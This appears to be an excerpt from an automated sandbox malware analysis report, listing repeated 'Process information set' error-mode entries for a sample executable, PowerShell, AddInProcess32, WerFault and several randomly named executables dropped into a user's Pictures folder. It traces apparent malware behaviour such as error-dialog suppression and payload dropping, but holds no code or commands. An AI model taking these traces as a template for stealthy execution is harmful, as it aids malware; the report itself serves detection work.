                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exeProcess information set: NOOPENFILEERRORBOX
